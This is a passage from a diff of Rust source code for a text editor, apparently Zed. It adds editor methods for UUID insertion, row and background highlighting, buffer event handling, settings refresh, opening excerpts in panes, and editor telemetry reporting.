|workspace, cx| { + struct OpenPermalinkToLine; + + workspace.show_toast( + Toast::new( + NotificationId::unique::(), + message, + ), + cx, + ) + }) + .ok(); + } + } + }) + .detach(); + } + + pub fn insert_uuid_v4( + &mut self, + _: &InsertUuidV4, + window: &mut Window, + cx: &mut Context, + ) { + self.insert_uuid(UuidVersion::V4, window, cx); + } + + pub fn insert_uuid_v7( + &mut self, + _: &InsertUuidV7, + window: &mut Window, + cx: &mut Context, + ) { + self.insert_uuid(UuidVersion::V7, window, cx); + } + + fn insert_uuid(&mut self, version: UuidVersion, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + let edits = this + .selections + .all::(cx) + .into_iter() + .map(|selection| { + let uuid = match version { + UuidVersion::V4 => uuid::Uuid::new_v4(), + UuidVersion::V7 => uuid::Uuid::now_v7(), + }; + + (selection.range(), uuid.to_string()) + }); + this.edit(edits, cx); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn open_selections_in_multibuffer( + &mut self, + _: &OpenSelectionsInMultibuffer, + window: &mut Window, + cx: &mut Context, + ) { + let multibuffer = self.buffer.read(cx); + + let Some(buffer) = multibuffer.as_singleton() else { + return; + }; + + let Some(workspace) = self.workspace() else { + return; + }; + + let locations = self + .selections + .disjoint_anchors() + .iter() + .map(|range| Location { + buffer: buffer.clone(), + range: range.start.text_anchor..range.end.text_anchor, + }) + .collect::>(); + + let title = multibuffer.title(cx).to_string(); + + cx.spawn_in(window, async move |_, cx| { + workspace.update_in(cx, |workspace, window, cx| { + Self::open_locations_in_multibuffer( + workspace, + locations, + format!("Selections for '{title}'"), + false, + MultibufferSelectionMode::All, + window, + cx, + ); + }) + }) + .detach(); + } + + /// Adds a row highlight for the given range. If a row has multiple highlights, the + /// last highlight added will be used. + /// + /// If the range ends at the beginning of a line, then that line will not be highlighted. + pub fn highlight_rows( + &mut self, + range: Range, + color: Hsla, + options: RowHighlightOptions, + cx: &mut Context, + ) { + let snapshot = self.buffer().read(cx).snapshot(cx); + let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); + let ix = row_highlights.binary_search_by(|highlight| { + Ordering::Equal + .then_with(|| highlight.range.start.cmp(&range.start, &snapshot)) + .then_with(|| highlight.range.end.cmp(&range.end, &snapshot)) + }); + + if let Err(mut ix) = ix { + let index = post_inc(&mut self.highlight_order); + + // If this range intersects with the preceding highlight, then merge it with + // the preceding highlight. Otherwise insert a new highlight. + let mut merged = false; + if ix > 0 { + let prev_highlight = &mut row_highlights[ix - 1]; + if prev_highlight + .range + .end + .cmp(&range.start, &snapshot) + .is_ge() + { + ix -= 1; + if prev_highlight.range.end.cmp(&range.end, &snapshot).is_lt() { + prev_highlight.range.end = range.end; + } + merged = true; + prev_highlight.index = index; + prev_highlight.color = color; + prev_highlight.options = options; + } + } + + if !merged { + row_highlights.insert( + ix, + RowHighlight { + range: range.clone(), + index, + color, + options, + type_id: TypeId::of::(), + }, + ); + } + + // If any of the following highlights intersect with this one, merge them. + while let Some(next_highlight) = row_highlights.get(ix + 1) { + let highlight = &row_highlights[ix]; + if next_highlight + .range + .start + .cmp(&highlight.range.end, &snapshot) + .is_le() + { + if next_highlight + .range + .end + .cmp(&highlight.range.end, &snapshot) + .is_gt() + { + row_highlights[ix].range.end = next_highlight.range.end; + } + row_highlights.remove(ix + 1); + } else { + break; + } + } + } + } + + /// Remove any highlighted row ranges of the given type that intersect the + /// given ranges. + pub fn remove_highlighted_rows( + &mut self, + ranges_to_remove: Vec>, + cx: &mut Context, + ) { + let snapshot = self.buffer().read(cx).snapshot(cx); + let row_highlights = self.highlighted_rows.entry(TypeId::of::()).or_default(); + let mut ranges_to_remove = ranges_to_remove.iter().peekable(); + row_highlights.retain(|highlight| { + while let Some(range_to_remove) = ranges_to_remove.peek() { + match range_to_remove.end.cmp(&highlight.range.start, &snapshot) { + Ordering::Less | Ordering::Equal => { + ranges_to_remove.next(); + } + Ordering::Greater => { + match range_to_remove.start.cmp(&highlight.range.end, &snapshot) { + Ordering::Less | Ordering::Equal => { + return false; + } + Ordering::Greater => break, + } + } + } + } + + true + }) + } + + /// Clear all anchor ranges for a certain highlight context type, so no corresponding rows will be highlighted. + pub fn clear_row_highlights(&mut self) { + self.highlighted_rows.remove(&TypeId::of::()); + } + + /// For a highlight given context type, gets all anchor ranges that will be used for row highlighting. + pub fn highlighted_rows(&self) -> impl '_ + Iterator, Hsla)> { + self.highlighted_rows + .get(&TypeId::of::()) + .map_or(&[] as &[_], |vec| vec.as_slice()) + .iter() + .map(|highlight| (highlight.range.clone(), highlight.color)) + } + + /// Merges all anchor ranges for all context types ever set, picking the last highlight added in case of a row conflict. + /// Returns a map of display rows that are highlighted and their corresponding highlight color. + /// Allows to ignore certain kinds of highlights. + pub fn highlighted_display_rows( + &self, + window: &mut Window, + cx: &mut App, + ) -> BTreeMap { + let snapshot = self.snapshot(window, cx); + let mut used_highlight_orders = HashMap::default(); + self.highlighted_rows + .iter() + .flat_map(|(_, highlighted_rows)| highlighted_rows.iter()) + .fold( + BTreeMap::::new(), + |mut unique_rows, highlight| { + let start = highlight.range.start.to_display_point(&snapshot); + let end = highlight.range.end.to_display_point(&snapshot); + let start_row = start.row().0; + let end_row = if highlight.range.end.text_anchor != text::Anchor::MAX + && end.column() == 0 + { + end.row().0.saturating_sub(1) + } else { + end.row().0 + }; + for row in start_row..=end_row { + let used_index = + used_highlight_orders.entry(row).or_insert(highlight.index); + if highlight.index >= *used_index { + *used_index = highlight.index; + unique_rows.insert( + DisplayRow(row), + LineHighlight { + include_gutter: highlight.options.include_gutter, + border: None, + background: highlight.color.into(), + type_id: Some(highlight.type_id), + }, + ); + } + } + unique_rows + }, + ) + } + + pub fn highlighted_display_row_for_autoscroll( + &self, + snapshot: &DisplaySnapshot, + ) -> Option { + self.highlighted_rows + .values() + .flat_map(|highlighted_rows| highlighted_rows.iter()) + .filter_map(|highlight| { + if highlight.options.autoscroll { + Some(highlight.range.start.to_display_point(snapshot).row()) + } else { + None + } + }) + .min() + } + + pub fn set_search_within_ranges(&mut self, ranges: &[Range], cx: &mut Context) { + self.highlight_background::( + ranges, + |colors| colors.editor_document_highlight_read_background, + cx, + ) + } + + pub fn set_breadcrumb_header(&mut self, new_header: String) { + self.breadcrumb_header = Some(new_header); + } + + pub fn clear_search_within_ranges(&mut self, cx: &mut Context) { + self.clear_background_highlights::(cx); + } + + pub fn highlight_background( + &mut self, + ranges: &[Range], + color_fetcher: fn(&ThemeColors) -> Hsla, + cx: &mut Context, + ) { + self.background_highlights + .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + + pub fn clear_background_highlights( + &mut self, + cx: &mut Context, + ) -> Option { + let text_highlights = self.background_highlights.remove(&TypeId::of::())?; + if !text_highlights.1.is_empty() { + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + Some(text_highlights) + } + + pub fn highlight_gutter( + &mut self, + ranges: &[Range], + color_fetcher: fn(&App) -> Hsla, + cx: &mut Context, + ) { + self.gutter_highlights + .insert(TypeId::of::(), (color_fetcher, Arc::from(ranges))); + cx.notify(); + } + + pub fn clear_gutter_highlights( + &mut self, + cx: &mut Context, + ) -> Option { + cx.notify(); + self.gutter_highlights.remove(&TypeId::of::()) + } + + #[cfg(feature = "test-support")] + pub fn all_text_background_highlights( + &self, + window: &mut Window, + cx: &mut Context, + ) -> Vec<(Range, Hsla)> { + let snapshot = self.snapshot(window, cx); + let buffer = &snapshot.buffer_snapshot; + let start = buffer.anchor_before(0); + let end = buffer.anchor_after(buffer.len()); + let theme = cx.theme().colors(); + self.background_highlights_in_range(start..end, &snapshot, theme) + } + + #[cfg(feature = "test-support")] + pub fn search_background_highlights(&mut self, cx: &mut Context) -> Vec> { + let snapshot = self.buffer().read(cx).snapshot(cx); + + let highlights = self + .background_highlights + .get(&TypeId::of::()); + + if let Some((_color, ranges)) = highlights { + ranges + .iter() + .map(|range| range.start.to_point(&snapshot)..range.end.to_point(&snapshot)) + .collect_vec() + } else { + vec![] + } + } + + fn document_highlights_for_position<'a>( + &'a self, + position: Anchor, + buffer: &'a MultiBufferSnapshot, + ) -> impl 'a + Iterator> { + let read_highlights = self + .background_highlights + .get(&TypeId::of::()) + .map(|h| &h.1); + let write_highlights = self + .background_highlights + .get(&TypeId::of::()) + .map(|h| &h.1); + let left_position = position.bias_left(buffer); + let right_position = position.bias_right(buffer); + read_highlights + .into_iter() + .chain(write_highlights) + .flat_map(move |ranges| { + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe.end.cmp(&left_position, buffer); + if cmp.is_ge() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + + ranges[start_ix..] + .iter() + .take_while(move |range| range.start.cmp(&right_position, buffer).is_le()) + }) + } + + pub fn has_background_highlights(&self) -> bool { + self.background_highlights + .get(&TypeId::of::()) + .map_or(false, |(_, highlights)| !highlights.is_empty()) + } + + pub fn background_highlights_in_range( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + theme: &ThemeColors, + ) -> Vec<(Range, Hsla)> { + let mut results = Vec::new(); + for (color_fetcher, ranges) in self.background_highlights.values() { + let color = color_fetcher(theme); + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + for range in &ranges[start_ix..] { + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + + let start = range.start.to_display_point(display_snapshot); + let end = range.end.to_display_point(display_snapshot); + results.push((start..end, color)) + } + } + results + } + + pub fn background_highlight_row_ranges( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + count: usize, + ) -> Vec> { + let mut results = Vec::new(); + let Some((_, ranges)) = self.background_highlights.get(&TypeId::of::()) else { + return vec![]; + }; + + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + let mut push_region = |start: Option, end: Option| { + if let (Some(start_display), Some(end_display)) = (start, end) { + results.push( + start_display.to_display_point(display_snapshot) + ..=end_display.to_display_point(display_snapshot), + ); + } + }; + let mut start_row: Option = None; + let mut end_row: Option = None; + if ranges.len() > count { + return Vec::new(); + } + for range in &ranges[start_ix..] { + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + let end = range.end.to_point(&display_snapshot.buffer_snapshot); + if let Some(current_row) = &end_row { + if end.row == current_row.row { + continue; + } + } + let start = range.start.to_point(&display_snapshot.buffer_snapshot); + if start_row.is_none() { + assert_eq!(end_row, None); + start_row = Some(start); + end_row = Some(end); + continue; + } + if let Some(current_end) = end_row.as_mut() { + if start.row > current_end.row + 1 { + push_region(start_row, end_row); + start_row = Some(start); + end_row = Some(end); + } else { + // Merge two hunks. + *current_end = end; + } + } else { + unreachable!(); + } + } + // We might still have a hunk that was not rendered (if there was a search hit on the last line) + push_region(start_row, end_row); + results + } + + pub fn gutter_highlights_in_range( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + cx: &App, + ) -> Vec<(Range, Hsla)> { + let mut results = Vec::new(); + for (color_fetcher, ranges) in self.gutter_highlights.values() { + let color = color_fetcher(cx); + let start_ix = match ranges.binary_search_by(|probe| { + let cmp = probe + .end + .cmp(&search_range.start, &display_snapshot.buffer_snapshot); + if cmp.is_gt() { + Ordering::Greater + } else { + Ordering::Less + } + }) { + Ok(i) | Err(i) => i, + }; + for range in &ranges[start_ix..] { + if range + .start + .cmp(&search_range.end, &display_snapshot.buffer_snapshot) + .is_ge() + { + break; + } + + let start = range.start.to_display_point(display_snapshot); + let end = range.end.to_display_point(display_snapshot); + results.push((start..end, color)) + } + } + results + } + + /// Get the text ranges corresponding to the redaction query + pub fn redacted_ranges( + &self, + search_range: Range, + display_snapshot: &DisplaySnapshot, + cx: &App, + ) -> Vec> { + display_snapshot + .buffer_snapshot + .redacted_ranges(search_range, |file| { + if let Some(file) = file { + file.is_private() + && EditorSettings::get( + Some(SettingsLocation { + worktree_id: file.worktree_id(cx), + path: file.path().as_ref(), + }), + cx, + ) + .redact_private_values + } else { + false + } + }) + .map(|range| { + range.start.to_display_point(display_snapshot) + ..range.end.to_display_point(display_snapshot) + }) + .collect() + } + + pub fn highlight_text( + &mut self, + ranges: Vec>, + style: HighlightStyle, + cx: &mut Context, + ) { + self.display_map.update(cx, |map, _| { + map.highlight_text(TypeId::of::(), ranges, style) + }); + cx.notify(); + } + + pub(crate) fn highlight_inlays( + &mut self, + highlights: Vec, + style: HighlightStyle, + cx: &mut Context, + ) { + self.display_map.update(cx, |map, _| { + map.highlight_inlays(TypeId::of::(), highlights, style) + }); + cx.notify(); + } + + pub fn text_highlights<'a, T: 'static>( + &'a self, + cx: &'a App, + ) -> Option<(HighlightStyle, &'a [Range])> { + self.display_map.read(cx).text_highlights(TypeId::of::()) + } + + pub fn clear_highlights(&mut self, cx: &mut Context) { + let cleared = self + .display_map + .update(cx, |map, _| map.clear_highlights(TypeId::of::())); + if cleared { + cx.notify(); + } + } + + pub fn show_local_cursors(&self, window: &mut Window, cx: &mut App) -> bool { + (self.read_only(cx) || self.blink_manager.read(cx).visible()) + && self.focus_handle.is_focused(window) + } + + pub fn set_show_cursor_when_unfocused(&mut self, is_enabled: bool, cx: &mut Context) { + self.show_cursor_when_unfocused = is_enabled; + cx.notify(); + } + + fn on_buffer_changed(&mut self, _: Entity, cx: &mut Context) { + cx.notify(); + } + + fn on_debug_session_event( + &mut self, + _session: Entity, + event: &SessionEvent, + cx: &mut Context, + ) { + match event { + SessionEvent::InvalidateInlineValue => { + self.refresh_inline_values(cx); + } + _ => {} + } + } + + fn refresh_inline_values(&mut self, cx: &mut Context) { + let Some(project) = self.project.clone() else { + return; + }; + let Some(buffer) = self.buffer.read(cx).as_singleton() else { + return; + }; + if !self.inline_value_cache.enabled { + let inlays = std::mem::take(&mut self.inline_value_cache.inlays); + self.splice_inlays(&inlays, Vec::new(), cx); + return; + } + + let current_execution_position = self + .highlighted_rows + .get(&TypeId::of::()) + .and_then(|lines| lines.last().map(|line| line.range.start)); + + self.inline_value_cache.refresh_task = cx.spawn(async move |editor, cx| { + let snapshot = editor + .update(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)) + .ok()?; + + let inline_values = editor + .update(cx, |_, cx| { + let Some(current_execution_position) = current_execution_position else { + return Some(Task::ready(Ok(Vec::new()))); + }; + + // todo(debugger) when introducing multi buffer inline values check execution position's buffer id to make sure the text + // anchor is in the same buffer + let range = + buffer.read(cx).anchor_before(0)..current_execution_position.text_anchor; + project.inline_values(buffer, range, cx) + }) + .ok() + .flatten()? + .await + .context("refreshing debugger inlays") + .log_err()?; + + let (excerpt_id, buffer_id) = snapshot + .excerpts() + .next() + .map(|excerpt| (excerpt.0, excerpt.1.remote_id()))?; + editor + .update(cx, |editor, cx| { + let new_inlays = inline_values + .into_iter() + .map(|debugger_value| { + Inlay::debugger_hint( + post_inc(&mut editor.next_inlay_id), + Anchor::in_buffer(excerpt_id, buffer_id, debugger_value.position), + debugger_value.text(), + ) + }) + .collect::>(); + let mut inlay_ids = new_inlays.iter().map(|inlay| inlay.id).collect(); + std::mem::swap(&mut editor.inline_value_cache.inlays, &mut inlay_ids); + + editor.splice_inlays(&inlay_ids, new_inlays, cx); + }) + .ok()?; + Some(()) + }); + } + + fn on_buffer_event( + &mut self, + multibuffer: &Entity, + event: &multi_buffer::Event, + window: &mut Window, + cx: &mut Context, + ) { + match event { + multi_buffer::Event::Edited { + singleton_buffer_edited, + edited_buffer: buffer_edited, + } => { + self.scrollbar_marker_state.dirty = true; + self.active_indent_guides_state.dirty = true; + self.refresh_active_diagnostics(cx); + self.refresh_code_actions(window, cx); + self.refresh_selected_text_highlights(true, window, cx); + refresh_matching_bracket_highlights(self, window, cx); + if self.has_active_inline_completion() { + self.update_visible_inline_completion(window, cx); + } + if let Some(buffer) = buffer_edited { + let buffer_id = buffer.read(cx).remote_id(); + if !self.registered_buffers.contains_key(&buffer_id) { + if let Some(project) = self.project.as_ref() { + project.update(cx, |project, cx| { + self.registered_buffers.insert( + buffer_id, + project.register_buffer_with_language_servers(&buffer, cx), + ); + }) + } + } + } + cx.emit(EditorEvent::BufferEdited); + cx.emit(SearchEvent::MatchesInvalidated); + if *singleton_buffer_edited { + if let Some(project) = &self.project { + #[allow(clippy::mutable_key_type)] + let languages_affected = multibuffer.update(cx, |multibuffer, cx| { + multibuffer + .all_buffers() + .into_iter() + .filter_map(|buffer| { + buffer.update(cx, |buffer, cx| { + let language = buffer.language()?; + let should_discard = project.update(cx, |project, cx| { + project.is_local() + && !project.has_language_servers_for(buffer, cx) + }); + should_discard.not().then_some(language.clone()) + }) + }) + .collect::>() + }); + if !languages_affected.is_empty() { + self.refresh_inlay_hints( + InlayHintRefreshReason::BufferEdited(languages_affected), + cx, + ); + } + } + } + + let Some(project) = &self.project else { return }; + let (telemetry, is_via_ssh) = { + let project = project.read(cx); + let telemetry = project.client().telemetry().clone(); + let is_via_ssh = project.is_via_ssh(); + (telemetry, is_via_ssh) + }; + refresh_linked_ranges(self, window, cx); + telemetry.log_edit_event("editor", is_via_ssh); + } + multi_buffer::Event::ExcerptsAdded { + buffer, + predecessor, + excerpts, + } => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + let buffer_id = buffer.read(cx).remote_id(); + if self.buffer.read(cx).diff_for(buffer_id).is_none() { + if let Some(project) = &self.project { + get_uncommitted_diff_for_buffer( + project, + [buffer.clone()], + self.buffer.clone(), + cx, + ) + .detach(); + } + } + cx.emit(EditorEvent::ExcerptsAdded { + buffer: buffer.clone(), + predecessor: *predecessor, + excerpts: excerpts.clone(), + }); + self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); + } + multi_buffer::Event::ExcerptsRemoved { + ids, + removed_buffer_ids, + } => { + self.refresh_inlay_hints(InlayHintRefreshReason::ExcerptsRemoved(ids.clone()), cx); + let buffer = self.buffer.read(cx); + self.registered_buffers + .retain(|buffer_id, _| buffer.buffer(*buffer_id).is_some()); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + cx.emit(EditorEvent::ExcerptsRemoved { + ids: ids.clone(), + removed_buffer_ids: removed_buffer_ids.clone(), + }) + } + multi_buffer::Event::ExcerptsEdited { + excerpt_ids, + buffer_ids, + } => { + self.display_map.update(cx, |map, cx| { + map.unfold_buffers(buffer_ids.iter().copied(), cx) + }); + cx.emit(EditorEvent::ExcerptsEdited { + ids: excerpt_ids.clone(), + }) + } + multi_buffer::Event::ExcerptsExpanded { ids } => { + self.refresh_inlay_hints(InlayHintRefreshReason::NewLinesShown, cx); + cx.emit(EditorEvent::ExcerptsExpanded { ids: ids.clone() }) + } + multi_buffer::Event::Reparsed(buffer_id) => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + + cx.emit(EditorEvent::Reparsed(*buffer_id)); + } + multi_buffer::Event::DiffHunksToggled => { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + } + multi_buffer::Event::LanguageChanged(buffer_id) => { + linked_editing_ranges::refresh_linked_ranges(self, window, cx); + jsx_tag_auto_close::refresh_enabled_in_any_buffer(self, multibuffer, cx); + cx.emit(EditorEvent::Reparsed(*buffer_id)); + cx.notify(); + } + multi_buffer::Event::DirtyChanged => cx.emit(EditorEvent::DirtyChanged), + multi_buffer::Event::Saved => cx.emit(EditorEvent::Saved), + multi_buffer::Event::FileHandleChanged + | multi_buffer::Event::Reloaded + | multi_buffer::Event::BufferDiffChanged => cx.emit(EditorEvent::TitleChanged), + multi_buffer::Event::Closed => cx.emit(EditorEvent::Closed), + multi_buffer::Event::DiagnosticsUpdated => { + self.refresh_active_diagnostics(cx); + self.refresh_inline_diagnostics(true, window, cx); + self.scrollbar_marker_state.dirty = true; + cx.notify(); + } + _ => {} + }; + } + + fn on_display_map_changed( + &mut self, + _: Entity, + _: &mut Window, + cx: &mut Context, + ) { + cx.notify(); + } + + fn settings_changed(&mut self, window: &mut Window, cx: &mut Context) { + self.tasks_update_task = Some(self.refresh_runnables(window, cx)); + self.update_edit_prediction_settings(cx); + self.refresh_inline_completion(true, false, window, cx); + self.refresh_inlay_hints( + InlayHintRefreshReason::SettingsChange(inlay_hint_settings( + self.selections.newest_anchor().head(), + &self.buffer.read(cx).snapshot(cx), + cx, + )), + cx, + ); + + let old_cursor_shape = self.cursor_shape; + + { + let editor_settings = EditorSettings::get_global(cx); + self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; + self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; + self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); + self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); + } + + if old_cursor_shape != self.cursor_shape { + cx.emit(EditorEvent::CursorShapeChanged); + } + + let project_settings = ProjectSettings::get_global(cx); + self.serialize_dirty_buffers = project_settings.session.restore_unsaved_buffers; + + if self.mode.is_full() { + let show_inline_diagnostics = project_settings.diagnostics.inline.enabled; + let inline_blame_enabled = project_settings.git.inline_blame_enabled(); + if self.show_inline_diagnostics != show_inline_diagnostics { + self.show_inline_diagnostics = show_inline_diagnostics; + self.refresh_inline_diagnostics(false, window, cx); + } + + if self.git_blame_inline_enabled != inline_blame_enabled { + self.toggle_git_blame_inline_internal(false, window, cx); + } + } + + cx.notify(); + } + + pub fn set_searchable(&mut self, searchable: bool) { + self.searchable = searchable; + } + + pub fn searchable(&self) -> bool { + self.searchable + } + + fn open_proposed_changes_editor( + &mut self, + _: &OpenProposedChangesEditor, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + cx.propagate(); + return; + }; + + let selections = self.selections.all::(cx); + let multi_buffer = self.buffer.read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let mut new_selections_by_buffer = HashMap::default(); + for selection in selections { + for (buffer, range, _) in + multi_buffer_snapshot.range_to_buffer_ranges(selection.start..selection.end) + { + let mut range = range.to_point(buffer); + range.start.column = 0; + range.end.column = buffer.line_len(range.end.row); + new_selections_by_buffer + .entry(multi_buffer.buffer(buffer.remote_id()).unwrap()) + .or_insert(Vec::new()) + .push(range) + } + } + + let proposed_changes_buffers = new_selections_by_buffer + .into_iter() + .map(|(buffer, ranges)| ProposedChangeLocation { buffer, ranges }) + .collect::>(); + let proposed_changes_editor = cx.new(|cx| { + ProposedChangesEditor::new( + "Proposed changes", + proposed_changes_buffers, + self.project.clone(), + window, + cx, + ) + }); + + window.defer(cx, move |window, cx| { + workspace.update(cx, |workspace, cx| { + workspace.active_pane().update(cx, |pane, cx| { + pane.add_item( + Box::new(proposed_changes_editor), + true, + true, + None, + window, + cx, + ); + }); + }); + }); + } + + pub fn open_excerpts_in_split( + &mut self, + _: &OpenExcerptsSplit, + window: &mut Window, + cx: &mut Context, + ) { + self.open_excerpts_common(None, true, window, cx) + } + + pub fn open_excerpts(&mut self, _: &OpenExcerpts, window: &mut Window, cx: &mut Context) { + self.open_excerpts_common(None, false, window, cx) + } + + fn open_excerpts_common( + &mut self, + jump_data: Option, + split: bool, + window: &mut Window, + cx: &mut Context, + ) { + let Some(workspace) = self.workspace() else { + cx.propagate(); + return; + }; + + if self.buffer.read(cx).is_singleton() { + cx.propagate(); + return; + } + + let mut new_selections_by_buffer = HashMap::default(); + match &jump_data { + Some(JumpData::MultiBufferPoint { + excerpt_id, + position, + anchor, + line_offset_from_top, + }) => { + let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); + if let Some(buffer) = multi_buffer_snapshot + .buffer_id_for_excerpt(*excerpt_id) + .and_then(|buffer_id| self.buffer.read(cx).buffer(buffer_id)) + { + let buffer_snapshot = buffer.read(cx).snapshot(); + let jump_to_point = if buffer_snapshot.can_resolve(anchor) { + language::ToPoint::to_point(anchor, &buffer_snapshot) + } else { + buffer_snapshot.clip_point(*position, Bias::Left) + }; + let jump_to_offset = buffer_snapshot.point_to_offset(jump_to_point); + new_selections_by_buffer.insert( + buffer, + ( + vec![jump_to_offset..jump_to_offset], + Some(*line_offset_from_top), + ), + ); + } + } + Some(JumpData::MultiBufferRow { + row, + line_offset_from_top, + }) => { + let point = MultiBufferPoint::new(row.0, 0); + if let Some((buffer, buffer_point, _)) = + self.buffer.read(cx).point_to_buffer_point(point, cx) + { + let buffer_offset = buffer.read(cx).point_to_offset(buffer_point); + new_selections_by_buffer + .entry(buffer) + .or_insert((Vec::new(), Some(*line_offset_from_top))) + .0 + .push(buffer_offset..buffer_offset) + } + } + None => { + let selections = self.selections.all::(cx); + let multi_buffer = self.buffer.read(cx); + for selection in selections { + for (snapshot, range, _, anchor) in multi_buffer + .snapshot(cx) + .range_to_buffer_ranges_with_deleted_hunks(selection.range()) + { + if let Some(anchor) = anchor { + // selection is in a deleted hunk + let Some(buffer_id) = anchor.buffer_id else { + continue; + }; + let Some(buffer_handle) = multi_buffer.buffer(buffer_id) else { + continue; + }; + let offset = text::ToOffset::to_offset( + &anchor.text_anchor, + &buffer_handle.read(cx).snapshot(), + ); + let range = offset..offset; + new_selections_by_buffer + .entry(buffer_handle) + .or_insert((Vec::new(), None)) + .0 + .push(range) + } else { + let Some(buffer_handle) = multi_buffer.buffer(snapshot.remote_id()) + else { + continue; + }; + new_selections_by_buffer + .entry(buffer_handle) + .or_insert((Vec::new(), None)) + .0 + .push(range) + } + } + } + } + } + + new_selections_by_buffer + .retain(|buffer, _| Self::can_open_excerpts_in_file(buffer.read(cx).file())); + + if new_selections_by_buffer.is_empty() { + return; + } + + // We defer the pane interaction because we ourselves are a workspace item + // and activating a new item causes the pane to call a method on us reentrantly, + // which panics if we're on the stack. + window.defer(cx, move |window, cx| { + workspace.update(cx, |workspace, cx| { + let pane = if split { + workspace.adjacent_pane(window, cx) + } else { + workspace.active_pane().clone() + }; + + for (buffer, (ranges, scroll_offset)) in new_selections_by_buffer { + let editor = buffer + .read(cx) + .file() + .is_none() + .then(|| { + // Handle file-less buffers separately: those are not really the project items, so won't have a project path or entity id, + // so `workspace.open_project_item` will never find them, always opening a new editor. + // Instead, we try to activate the existing editor in the pane first. + let (editor, pane_item_index) = + pane.read(cx).items().enumerate().find_map(|(i, item)| { + let editor = item.downcast::()?; + let singleton_buffer = + editor.read(cx).buffer().read(cx).as_singleton()?; + if singleton_buffer == buffer { + Some((editor, i)) + } else { + None + } + })?; + pane.update(cx, |pane, cx| { + pane.activate_item(pane_item_index, true, true, window, cx) + }); + Some(editor) + }) + .flatten() + .unwrap_or_else(|| { + workspace.open_project_item::( + pane.clone(), + buffer, + true, + true, + window, + cx, + ) + }); + + editor.update(cx, |editor, cx| { + let autoscroll = match scroll_offset { + Some(scroll_offset) => Autoscroll::top_relative(scroll_offset as usize), + None => Autoscroll::newest(), + }; + let nav_history = editor.nav_history.take(); + editor.change_selections(Some(autoscroll), window, cx, |s| { + s.select_ranges(ranges); + }); + editor.nav_history = nav_history; + }); + } + }) + }); + } + + // For now, don't allow opening excerpts in buffers that aren't backed by + // regular project files. + fn can_open_excerpts_in_file(file: Option<&Arc>) -> bool { + file.map_or(true, |file| project::File::from_dyn(Some(file)).is_some()) + } + + fn marked_text_ranges(&self, cx: &App) -> Option>> { + let snapshot = self.buffer.read(cx).read(cx); + let (_, ranges) = self.text_highlights::(cx)?; + Some( + ranges + .iter() + .map(move |range| { + range.start.to_offset_utf16(&snapshot)..range.end.to_offset_utf16(&snapshot) + }) + .collect(), + ) + } + + fn selection_replacement_ranges( + &self, + range: Range, + cx: &mut App, + ) -> Vec> { + let selections = self.selections.all::(cx); + let newest_selection = selections + .iter() + .max_by_key(|selection| selection.id) + .unwrap(); + let start_delta = range.start.0 as isize - newest_selection.start.0 as isize; + let end_delta = range.end.0 as isize - newest_selection.end.0 as isize; + let snapshot = self.buffer.read(cx).read(cx); + selections + .into_iter() + .map(|mut selection| { + selection.start.0 = + (selection.start.0 as isize).saturating_add(start_delta) as usize; + selection.end.0 = (selection.end.0 as isize).saturating_add(end_delta) as usize; + snapshot.clip_offset_utf16(selection.start, Bias::Left) + ..snapshot.clip_offset_utf16(selection.end, Bias::Right) + }) + .collect() + } + + fn report_editor_event( + &self, + event_type: &'static str, + file_extension: Option, + cx: &App, + ) { + if cfg!(any(test, feature = "test-support")) { + return; + } + + let Some(project) = &self.project else { return }; + + // If None, we are in a file without an extension + let file = self + .buffer + .read(cx) + .as_singleton() + .and_then(|b| b.read(cx).file()); + let file_extension = file_extension.or(file + .as_ref() + .and_then(|file| Path::new(file.file_name(cx)).extension()) + .and_then(|e| e.to_str()) + .map(|a| a.to_string())); + + let vim_mode = vim_enabled(cx); + + let edit_predictions_provider = all_language_settings(file, cx).edit_predictions.provider; + let copilot_enabled = edit_predictions_provider + == language::language_settings::EditPredictionProvider::Copilot; + let copilot_enabled_for_language = self + .buffer + .read(cx) + .language_settings(cx) + .show_edit_predictions; + + let project = project.read(cx); + telemetry::event!( + event_type, + file_extension, + vim_mode, + copilot_enabled, + copilot_enabled_for_language, + edit_predictions_provider, + is_via_ssh = project.is_via_ssh(), + ); + } + + /// Copy the highlighted chunks to the clipboard as JSON. The format is an array of lines, + /// with each line being an array of {text, highlight} objects. + fn copy_highlight_json( + &mut self, + _: &CopyHighlightJson, + window: &mut 